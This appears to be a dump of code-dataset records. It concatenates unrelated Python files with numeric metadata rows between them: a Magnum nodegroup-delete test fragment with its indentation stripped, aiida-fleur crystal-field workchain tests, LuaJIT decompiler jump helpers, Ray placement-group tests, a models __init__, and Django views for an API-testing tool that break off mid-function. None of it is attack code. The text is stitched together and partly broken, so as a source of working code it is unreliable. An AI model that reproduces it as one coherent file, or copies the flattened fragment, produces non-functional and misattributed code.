def test_nodegroup_delete(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
self.handler.nodegroup_delete(self.context, self.cluster,
self.nodegroup)
mock_driver.delete_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.DELETE_IN_PROGRESS,
self.nodegroup.status)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_delete_stack_not_found(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
nodegroup = mock.MagicMock()
mock_driver.delete_nodegroup.side_effect = exc.HTTPNotFound()
self.handler.nodegroup_delete(self.context, self.cluster, nodegroup)
mock_driver.delete_nodegroup.assert_called_once_with(self.context,
self.cluster,
nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
nodegroup.destroy.assert_called_once()
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_delete_stack_and_ng_not_found(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
nodegroup = mock.MagicMock()
mock_driver.delete_nodegroup.side_effect = exc.HTTPNotFound()
nodegroup.destroy.side_effect = exception.NodeGroupNotFound()
self.handler.nodegroup_delete(self.context, self.cluster, nodegroup)
mock_driver.delete_nodegroup.assert_called_once_with(self.context,
self.cluster,
nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
nodegroup.destroy.assert_called_once()
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_delete_stack_operation_ongoing(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
mock_driver.delete_nodegroup.side_effect = exc.HTTPConflict()
self.assertRaises(exception.NgOperationInProgress,
self.handler.nodegroup_delete,
self.context, self.cluster, self.nodegroup)
mock_driver.delete_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.DELETE_IN_PROGRESS,
self.nodegroup.status)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_delete_failed(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
side_effect = NotImplementedError("Delete failed")
mock_driver.delete_nodegroup.side_effect = side_effect
self.assertRaises(NotImplementedError,
self.handler.nodegroup_delete,
self.context, self.cluster, self.nodegroup)
mock_driver.delete_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.DELETE_FAILED,
self.nodegroup.status)
self.assertEqual("Delete failed", self.nodegroup.status_reason)
| 53.219178
| 78
| 0.619648
| 1,158
| 11,655
| 5.982729
| 0.123489
| 0.05918
| 0.049798
| 0.069861
| 0.830543
| 0.82347
| 0.812644
| 0.794169
| 0.79157
| 0.79157
| 0
| 0.000993
| 0.309052
| 11,655
| 218
| 79
| 53.463303
| 0.859307
| 0.054311
| 0
| 0.743316
| 0
| 0
| 0.058145
| 0.045971
| 0
| 0
| 0
| 0
| 0.26738
| 1
| 0.064171
| false
| 0
| 0.042781
| 0
| 0.112299
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e198be70fb7a14fc20465bb3e0464b5c606b8f5
| 8,227
|
py
|
Python
|
tests/workflows/test_cfcoeff_workchain.py
|
broeder-j/aiida_fleur_plugin
|
cca54b194f4b217abb69aaa1fca0db52c6c830c3
|
[
"MIT"
] | 1
|
2017-02-07T12:31:38.000Z
|
2017-02-07T12:31:38.000Z
|
tests/workflows/test_cfcoeff_workchain.py
|
broeder-j/aiida_fleur_plugin
|
cca54b194f4b217abb69aaa1fca0db52c6c830c3
|
[
"MIT"
] | 16
|
2017-04-03T11:42:50.000Z
|
2017-05-18T16:25:39.000Z
|
tests/workflows/test_cfcoeff_workchain.py
|
broeder-j/aiida_fleur_plugin
|
cca54b194f4b217abb69aaa1fca0db52c6c830c3
|
[
"MIT"
] | null | null | null |
###############################################################################
# Copyright (c), Forschungszentrum Jülich GmbH, IAS-1/PGI-1, Germany. #
# All rights reserved. #
# This file is part of the AiiDA-FLEUR package. #
# #
# The code is hosted on GitHub at https://github.com/JuDFTteam/aiida-fleur #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.flapw.de or #
# http://aiida-fleur.readthedocs.io/en/develop/ #
###############################################################################
''' Contains tests for the FleurCFWorkchain '''
import pytest
import aiida_fleur
from aiida_fleur.workflows.cfcoeff import FleurCFCoeffWorkChain
from aiida import orm
from aiida.engine import run_get_node
from aiida.cmdline.utils.common import get_workchain_report, get_calcjob_report
import os
aiida_path = os.path.dirname(aiida_fleur.__file__)
@pytest.mark.regression_test
@pytest.mark.timeout(1000, method='thread')
def test_fleur_cfcoeff_structure_no_analogue(with_export_cache, fleur_local_code, inpgen_local_code,
generate_smco5_structure, clear_database, aiida_caplog):
"""
Full example using the CFCoeff workchain with just a structure as input.
Calls scf for analogue and rare-earth system
"""
options = {
'resources': {
'num_machines': 1,
'num_mpiprocs_per_machine': 1
},
'max_wallclock_seconds': 5 * 60,
'withmpi': False,
'custom_scheduler_commands': ''
}
FleurCode = fleur_local_code
desc = FleurCode.description
    with_hdf5 = desc is not None and any(tag in desc for tag in ('hdf5', 'Hdf5', 'HDF5'))
if not with_hdf5:
pytest.skip('CFCoeff workchain only works with HDF5')
# create process builder to set parameters
builder = FleurCFCoeffWorkChain.get_builder()
builder.metadata.description = 'Simple Fleur CFcoeff test for SmCo5 bulk with structure data given'
builder.metadata.label = 'FleurCFCoeff_test_analogue'
builder.scf.fleur = FleurCode
builder.scf.options = orm.Dict(dict=options).store()
builder.scf.inpgen = inpgen_local_code
builder.scf.structure = generate_smco5_structure()
builder.scf.calc_parameters = orm.Dict(
dict={
'comp': {
'kmax': 3.0,
'gmax': 7.0,
'gmaxxc': 7.0
},
'exco': {
'xctyp': 'vwn'
},
'kpt': {
'div1': 1,
'div2': 1,
'div3': 1
}
})
builder.wf_parameters = orm.Dict(dict={'element': 'Sm'})
# now run calculation
#run_with_cache(builder)
data_dir_path = os.path.join(aiida_path,
'../tests/workflows/caches/fleur_cfcoeff_smco5_structure_no_analogue.tar.gz')
with with_export_cache(data_dir_abspath=data_dir_path):
out, node = run_get_node(builder)
#print(out)
#print(node)
print(get_workchain_report(node, 'REPORT'))
#assert node.is_finished_ok
# check output
n = out['output_cfcoeff_wc_para']
n = n.get_dict()
assert 'output_cfcoeff_wc_potentials' in out
assert 'output_cfcoeff_wc_charge_densities' in out
from pprint import pprint
pprint(n)
assert n['cf_coefficients_convention'] == 'Stevens'
assert n['cf_coefficients_site_symmetries'] == ['6/mmm']
assert n['angle_a_to_x_axis'] == 0.0
assert n['angle_c_to_z_axis'] == 0.0
assert sorted(n['cf_coefficients_spin_up'].keys()) == ['2/0', '4/0', '6/-6', '6/0', '6/6']
assert sorted(n['cf_coefficients_spin_down'].keys()) == ['2/0', '4/0', '6/-6', '6/0', '6/6']
keys = sorted(n['cf_coefficients_spin_up'].keys())
assert pytest.approx([n['cf_coefficients_spin_up'][key] for key in keys]) \
        == [-530.07676884271, -51.531259261553, 91.429428364653, 3.9379215268871, 91.429428364653]
assert pytest.approx([n['cf_coefficients_spin_down'][key] for key in keys]) \
        == [-585.50088518635, 107.57251558557, 66.240659350976, 2.8694095323364, 66.240659350976]
@pytest.mark.regression_test
@pytest.mark.timeout(1000, method='thread')
def test_fleur_cfcoeff_structure_analogue(with_export_cache, fleur_local_code, inpgen_local_code,
generate_smco5_structure, clear_database, aiida_caplog):
"""
Full example using the CFCoeff workchain with just a structure as input.
Calls scf for analogue and rare-earth system
"""
options = {
'resources': {
'num_machines': 1,
'num_mpiprocs_per_machine': 1
},
'max_wallclock_seconds': 5 * 60,
'withmpi': False,
'custom_scheduler_commands': ''
}
FleurCode = fleur_local_code
desc = FleurCode.description
    with_hdf5 = desc is not None and any(tag in desc for tag in ('hdf5', 'Hdf5', 'HDF5'))
if not with_hdf5:
pytest.skip('CFCoeff workchain only works with HDF5')
# create process builder to set parameters
builder = FleurCFCoeffWorkChain.get_builder()
builder.metadata.description = 'Simple Fleur CFcoeff test for SmCo5 bulk with structure data given'
builder.metadata.label = 'FleurCFCoeff_test_analogue'
builder.scf.fleur = FleurCode
builder.scf.options = orm.Dict(dict=options).store()
builder.scf.inpgen = inpgen_local_code
builder.scf.structure = generate_smco5_structure()
builder.scf.calc_parameters = orm.Dict(
dict={
'comp': {
'kmax': 3.0,
'gmax': 7.0,
'gmaxxc': 7.0
},
'exco': {
'xctyp': 'vwn'
},
'kpt': {
'div1': 1,
'div2': 1,
'div3': 1
}
})
builder.scf_rare_earth_analogue.fleur = FleurCode
builder.scf_rare_earth_analogue.inpgen = inpgen_local_code
builder.scf_rare_earth_analogue.options = orm.Dict(dict=options).store()
builder.wf_parameters = orm.Dict(dict={'element': 'Sm', 'rare_earth_analogue': True})
# now run calculation
#run_with_cache(builder)
data_dir_path = os.path.join(aiida_path, '../tests/workflows/caches/fleur_cfcoeff_smco5_structure_analogue.tar.gz')
with with_export_cache(data_dir_abspath=data_dir_path):
out, node = run_get_node(builder)
#print(out)
#print(node)
print(get_workchain_report(node, 'REPORT'))
#assert node.is_finished_ok
# check output
n = out['output_cfcoeff_wc_para']
n = n.get_dict()
assert 'output_cfcoeff_wc_potentials' in out
assert 'output_cfcoeff_wc_charge_densities' in out
from pprint import pprint
pprint(n)
assert n['cf_coefficients_convention'] == 'Stevens'
assert n['cf_coefficients_site_symmetries'] == ['6/mmm']
assert n['angle_a_to_x_axis'] == 0.0
assert n['angle_c_to_z_axis'] == 0.0
assert sorted(n['cf_coefficients_spin_up'].keys()) == ['2/0', '4/0', '6/-6', '6/0', '6/6']
assert sorted(n['cf_coefficients_spin_down'].keys()) == ['2/0', '4/0', '6/-6', '6/0', '6/6']
keys = sorted(n['cf_coefficients_spin_up'].keys())
assert pytest.approx([n['cf_coefficients_spin_up'][key] for key in keys]) \
== [-1326.3111439024, 29.816507610986, 80.111746599164, 3.1490421501724, 80.111746599164]
assert pytest.approx([n['cf_coefficients_spin_down'][key] for key in keys]) \
== [-1237.5714206598,
20.016912116816,
75.244818163538,
2.6312426823951,
75.244818163538]
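The coefficient assertions above lean on pytest.approx applied to whole lists; a minimal standalone sketch of that comparison style, with made-up numbers:

import pytest

def test_list_approx():
    computed = [0.1 + 0.2, 2.0 / 3.0]
    # approx compares element-wise with a relative tolerance, so the
    # float noise in 0.1 + 0.2 does not break the equality check.
    assert computed == pytest.approx([0.3, 0.6666666666666666])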
| 37.56621
| 119
| 0.602893
| 994
| 8,227
| 4.759557
| 0.239437
| 0.023674
| 0.044388
| 0.040161
| 0.809977
| 0.796449
| 0.789896
| 0.783555
| 0.768548
| 0.768548
| 0
| 0.066722
| 0.267655
| 8,227
| 218
| 120
| 37.738532
| 0.718506
| 0.143552
| 0
| 0.775
| 0
| 0
| 0.213091
| 0.12577
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.0125
| false
| 0
| 0.05625
| 0
| 0.06875
| 0.0375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e7f4edaa2213ca12c33c8ddb197c6a41ae4bc4f
| 174
|
py
|
Python
|
ljd/bytecode/helpers.py
|
mengjie0718/ljd
|
2e4f0c472c5247e9cca730736e0bbea9661d2cfd
|
[
"MIT"
] | 46
|
2019-01-01T09:41:24.000Z
|
2021-12-27T02:00:06.000Z
|
ljd/bytecode/helpers.py
|
mengjie0718/ljd
|
2e4f0c472c5247e9cca730736e0bbea9661d2cfd
|
[
"MIT"
] | 2
|
2020-11-17T20:35:47.000Z
|
2021-12-16T14:30:09.000Z
|
ljd/bytecode/helpers.py
|
mengjie0718/ljd
|
2e4f0c472c5247e9cca730736e0bbea9661d2cfd
|
[
"MIT"
] | 18
|
2018-11-18T17:08:35.000Z
|
2022-01-16T08:15:21.000Z
|
def get_jump_destination(addr, instruction):
    # CD is a signed offset relative to the *next* instruction, hence the +1.
    return addr + instruction.CD + 1
def set_jump_destination(addr, instruction, value):
    # Inverse of get_jump_destination: re-encode value as a CD offset.
    instruction.CD = value - addr - 1
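A round-trip sketch for the two helpers, using a hypothetical instruction object that carries only the CD operand:

class FakeInstruction:
    # Stand-in for ljd's instruction type; only CD matters here.
    def __init__(self, cd=0):
        self.CD = cd

ins = FakeInstruction()
set_jump_destination(10, ins, 14)           # encodes CD = 14 - 10 - 1 = 3
assert ins.CD == 3
assert get_jump_destination(10, ins) == 14  # decoding round-trips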
| 24.857143
| 51
| 0.735632
| 23
| 174
| 5.391304
| 0.478261
| 0.362903
| 0.306452
| 0.483871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013889
| 0.172414
| 174
| 6
| 52
| 29
| 0.847222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
1e8de3199ec9162a03dc8fe0eb221419251081e6
| 4,436
|
py
|
Python
|
python/ray/tests/test_placement_group.py
|
bentzinir/ray
|
39b84166f88e271b279bd0b3ce56f81d24a1852c
|
[
"Apache-2.0"
] | null | null | null |
python/ray/tests/test_placement_group.py
|
bentzinir/ray
|
39b84166f88e271b279bd0b3ce56f81d24a1852c
|
[
"Apache-2.0"
] | null | null | null |
python/ray/tests/test_placement_group.py
|
bentzinir/ray
|
39b84166f88e271b279bd0b3ce56f81d24a1852c
|
[
"Apache-2.0"
] | null | null | null |
import pytest
try:
import pytest_timeout
except ImportError:
pytest_timeout = None
import sys
import os
import ray
import ray.test_utils
import ray.cluster_utils
@pytest.mark.skipif(
os.environ.get("RAY_GCS_ACTOR_SERVICE_ENABLED") != "true",
reason=("This edge case is not handled when GCS actor management is off. "
"We won't fix this because GCS actor management "
"will be on by default anyway."))
def test_placement_group_pack(ray_start_cluster):
@ray.remote(num_cpus=2)
class Actor(object):
def __init__(self):
self.n = 0
def value(self):
return self.n
cluster = ray_start_cluster
num_nodes = 2
for _ in range(num_nodes):
cluster.add_node(num_cpus=4)
ray.init(address=cluster.address)
placement_group_id = ray.experimental.placement_group(
name="name", strategy="PACK", bundles=[{
"CPU": 2
}, {
"CPU": 2
}])
actor_1 = Actor.options(
placement_group_id=placement_group_id,
placement_group_bundle_index=0).remote()
actor_2 = Actor.options(
placement_group_id=placement_group_id,
placement_group_bundle_index=1).remote()
print(ray.get(actor_1.value.remote()))
print(ray.get(actor_2.value.remote()))
# Get all actors.
actor_infos = ray.actors()
    # Make sure the two actors are collocated on the same node.
actor_info_1 = actor_infos.get(actor_1._actor_id.hex())
actor_info_2 = actor_infos.get(actor_2._actor_id.hex())
assert actor_info_1 and actor_info_2
node_of_actor_1 = actor_info_1["Address"]["NodeID"]
node_of_actor_2 = actor_info_2["Address"]["NodeID"]
assert node_of_actor_1 == node_of_actor_2
@pytest.mark.skipif(
os.environ.get("RAY_GCS_ACTOR_SERVICE_ENABLED") != "true",
reason=("This edge case is not handled when GCS actor management is off. "
"We won't fix this because GCS actor management "
"will be on by default anyway."))
def test_placement_group_pack_best_effort(ray_start_cluster):
@ray.remote(num_cpus=2)
class Actor(object):
def __init__(self):
self.n = 0
def value(self):
return self.n
# TODO(Shanly):
pass
@pytest.mark.skipif(
os.environ.get("RAY_GCS_ACTOR_SERVICE_ENABLED") != "true",
reason=("This edge case is not handled when GCS actor management is off. "
"We won't fix this because GCS actor management "
"will be on by default anyway."))
def test_placement_group_spread(ray_start_cluster):
@ray.remote(num_cpus=2)
class Actor(object):
def __init__(self):
self.n = 0
def value(self):
return self.n
cluster = ray_start_cluster
num_nodes = 2
for _ in range(num_nodes):
cluster.add_node(num_cpus=4)
ray.init(address=cluster.address)
placement_group_id = ray.experimental.placement_group(
name="name", strategy="SPREAD", bundles=[{
"CPU": 2
}, {
"CPU": 2
}])
    actor_1 = Actor.options(
        placement_group_id=placement_group_id,
        placement_group_bundle_index=0).remote()
    actor_2 = Actor.options(
        placement_group_id=placement_group_id,
        placement_group_bundle_index=1).remote()
print(ray.get(actor_1.value.remote()))
print(ray.get(actor_2.value.remote()))
# Get all actors.
actor_infos = ray.actors()
    # Make sure the two actors land on different nodes (SPREAD strategy).
actor_info_1 = actor_infos.get(actor_1._actor_id.hex())
actor_info_2 = actor_infos.get(actor_2._actor_id.hex())
assert actor_info_1 and actor_info_2
node_of_actor_1 = actor_info_1["Address"]["NodeID"]
node_of_actor_2 = actor_info_2["Address"]["NodeID"]
assert node_of_actor_1 != node_of_actor_2
@pytest.mark.skipif(
os.environ.get("RAY_GCS_ACTOR_SERVICE_ENABLED") != "true",
reason=("This edge case is not handled when GCS actor management is off. "
"We won't fix this because GCS actor management "
"will be on by default anyway."))
def test_placement_group_spread_best_effort(ray_start_cluster):
@ray.remote(num_cpus=2)
class Actor(object):
def __init__(self):
self.n = 0
def value(self):
return self.n
# TODO(Shanly):
pass
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
| 29.573333
| 78
| 0.657574
| 634
| 4,436
| 4.291798
| 0.167192
| 0.092613
| 0.058802
| 0.055127
| 0.935685
| 0.935685
| 0.935685
| 0.935685
| 0.935685
| 0.935685
| 0
| 0.015362
| 0.236925
| 4,436
| 149
| 79
| 29.771812
| 0.788479
| 0.042606
| 0
| 0.785714
| 0
| 0
| 0.184906
| 0.027358
| 0
| 0
| 0
| 0.006711
| 0.035714
| 1
| 0.107143
| false
| 0.017857
| 0.071429
| 0.035714
| 0.25
| 0.035714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ebcdfa2ac767a537cc2bbc54b679ea6501f8872
| 136
|
py
|
Python
|
dcp/models/__init__.py
|
baoyinhe/DCP
|
2348087ca824c36f131f590260eedf84aae5774d
|
[
"BSD-3-Clause"
] | 170
|
2019-01-24T07:57:40.000Z
|
2022-03-31T06:31:59.000Z
|
dcp/models/__init__.py
|
baoyinhe/DCP
|
2348087ca824c36f131f590260eedf84aae5774d
|
[
"BSD-3-Clause"
] | 16
|
2019-01-16T07:42:57.000Z
|
2021-11-24T03:22:31.000Z
|
dcp/models/__init__.py
|
baoyinhe/DCP
|
2348087ca824c36f131f590260eedf84aae5774d
|
[
"BSD-3-Clause"
] | 29
|
2019-01-28T02:16:59.000Z
|
2022-01-26T06:49:23.000Z
|
from .preresnet import *
from .pruned_preresnet import *
from .resnet import *
from .pruned_vgg import *
| 27.2
| 31
| 0.786765
| 18
| 136
| 5.777778
| 0.333333
| 0.384615
| 0.548077
| 0.480769
| 0.673077
| 0.673077
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139706
| 136
| 5
| 32
| 27.2
| 0.888889
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1eca75dc07e190f4e13cec8533e9d9a4900cd680
| 65,078
|
py
|
Python
|
apitest/api_test/api/automation.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | null | null | null |
apitest/api_test/api/automation.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | 3
|
2020-06-06T01:57:41.000Z
|
2021-06-10T22:57:58.000Z
|
apitest/api_test/api/automation.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | null | null | null |
import logging
import traceback
import ast
from datetime import datetime
from django.core.exceptions import ObjectDoesNotExist
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.db import transaction
from django.db.models import Q
from api_test.common.auth import TokenAuthentication
from rest_framework.views import APIView
from api_test.common.api_response import JsonResponse
from api_test.common.common import record_dynamic
from api_test.common.paramUtil import ParamUtil
from api_test.common.jsonUtil import json
from api_test.service.runService import RunService
from api_test.service.taskService import TaskService
from api_test.service.publishService import PublishService
from api_test.service.commandService import CommandService
from api_test.common.auth import permission_required
from api_test.models import Project, Group, Automation, AutomationTask,AutomationStep, ApiInfo, Automation2Step,\
AutomationList2Automation,AutomationResult,ProjectConfig,PublishConfig
from api_test.serializers import ProjectSerializer,ApiInfoSerializer, AutomationSerializer, AutomationListSerializer,AutomationDeserializer, \
AutomationTaskSerializer,AutomationStepSerializer,AutomationResultSerializer,GroupSerializer,Automation2StepSerializer,\
AutomationList2AutomationSerializer,AutomationTaskDeserializer,PublishConfigSerializer,PublishConfigDeserializer
class GroupList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
        Get the group tree of a project.
:return:
"""
project_id = request.GET.get("project_id")
if not project_id:
return JsonResponse(code="999996", msg="参数有误!")
if not project_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
pro_data = Project.objects.get(id=project_id)
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
groups = getSubGroups(project_id)
return JsonResponse(data=groups, code="999999", msg="成功!")
def getSubGroups(project_id,groupId=None):
subGroups=[]
if groupId:
groups = Group.objects.filter(project=project_id,parent=groupId).order_by("id")
else:
groups = Group.objects.filter(project=project_id,parent__isnull=True).order_by("id")
for group in groups:
groupInfo={"id":str(group.id),"label":group.name,"value":{"path":"/autolist/project=%s/group=%s" % (project_id,group.id)}}
childGroups=getSubGroups(project_id,group.id)
if len(childGroups)>0:
groupInfo["children"]=childGroups
subGroups.append(groupInfo)
return subGroups
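# Illustrative shape of the tree returned by getSubGroups (values hypothetical):
#
#     [{"id": "1", "label": "smoke",
#       "value": {"path": "/autolist/project=3/group=1"},
#       "children": [...]}]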
class AddGroup(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
        Validate parameters.
:param data:
:return:
"""
try:
            # Check that project_id is an int
if not isinstance(data["project_id"], int):
return JsonResponse(code="999996", msg="参数有误!")
            # Required parameters: name, host
if not data["name"]:
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("add_automationgroup")
def post(self, request):
"""
        Add a group.
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
obj = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(obj)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
parent = Group.objects.get(id=data["parent_id"])
except ObjectDoesNotExist:
parent=None
serializer = GroupSerializer(data=data)
if serializer.is_valid():
serializer.save(project=obj,parent=parent)
else:
return JsonResponse(code="999998", msg="失败!")
record_dynamic(project=serializer.data.get("id"),
_type="添加", operationObject="分组", user=request.user.pk,
data="新增分组“%s”" % data["name"])
return JsonResponse(data={
"group_id": serializer.data.get("id")
}, code="999999", msg="成功!")
class DelGroup(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
        Validate parameters.
:param data:
:return:
"""
try:
            # Check that project_id and id are ints
if not isinstance(data["project_id"], int) or not isinstance(data["id"], int):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("delete_automationgroup")
def post(self, request):
"""
        Delete a group.
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
pro_data = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
obi = Group.objects.filter(id=data["id"], project=data["project_id"])
if obi:
name = obi[0].name
obi.delete()
else:
return JsonResponse(code="999991", msg="分组不存在!")
record_dynamic(project=data["project_id"],
_type="删除", operationObject="分组", user=request.user.pk, data="删除分组“%s”" % name)
return JsonResponse(code="999999", msg="成功!")
class UpdateNameGroup(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
        Validate parameters.
:param data:
:return:
"""
try:
            # Check that project_id and id are ints
if not isinstance(data["project_id"], int) or not isinstance(data["id"], int):
return JsonResponse(code="999996", msg="参数有误!")
            # Required parameters: name, host
if not data["name"]:
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automationgroup")
def post(self, request):
"""
        Rename a group.
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
pro_data = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
obj = Group.objects.get(id=data["id"], project=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999991", msg="分组不存在!")
serializer = GroupSerializer(data=data)
if serializer.is_valid():
serializer.update(instance=obj, validated_data=data)
else:
return JsonResponse(code="999998", msg="失败!")
record_dynamic(project=serializer.data.get("id"),
_type="修改", operationObject="分组", user=request.user.pk,
data="修改分组“%s”" % data["name"])
return JsonResponse(code="999999", msg="成功!")
class UpdateGroup(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
        Validate parameters.
:param data:
:return:
"""
try:
            # Check project_id, ids and group_id types
if not data["project_id"] or not data["ids"] or not data["group_id"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["ids"], list) \
or not isinstance(data["group_id"], int):
return JsonResponse(code="999996", msg="参数有误!")
for i in data["ids"]:
if not isinstance(i, int):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automationgroup")
def post(self, request):
"""
        Change the group of test cases.
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
pro_data = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
obj = Group.objects.get(id=data["group_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999991", msg="分组不存在!")
id_list = Q()
for i in data["ids"]:
id_list = id_list | Q(id=i)
case_list = Automation.objects.filter(id_list, project=data["project_id"])
with transaction.atomic():
case_list.update(group=obj)
name_list = []
for j in case_list:
name_list.append(str(j.name))
record_dynamic(project=data["project_id"],
_type="修改", operationObject="用例", user=request.user.pk, data="修改用例分组,列表“%s”" % name_list)
return JsonResponse(code="999999", msg="成功!")
class AutomationList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
        Get the automation list.
:param request:
:return:
"""
try:
page = int(request.GET.get("page", 1))
project_id = request.GET.get("project_id")
automation_id = request.GET.get("automation_id")
group_id = request.GET.get("first_group_id")
type = request.GET.get("type")
name = request.GET.get("name")
exclude = ast.literal_eval(request.GET.get("exclude","[]"))
page_size = int(request.GET.get("page_size", 20)) if not group_id else 100
except (TypeError, ValueError):
return JsonResponse(code="999985", msg="page and page_size must be integer!")
if not project_id:
return JsonResponse(code="999996", msg="参数有误!")
if not project_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
pro_data = Project.objects.get(id=project_id)
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
if automation_id:
automation=Automation.objects.get(id=automation_id)
obis=automation.automations.all().order_by("id")
else:
if group_id:
if not group_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
if name and type:
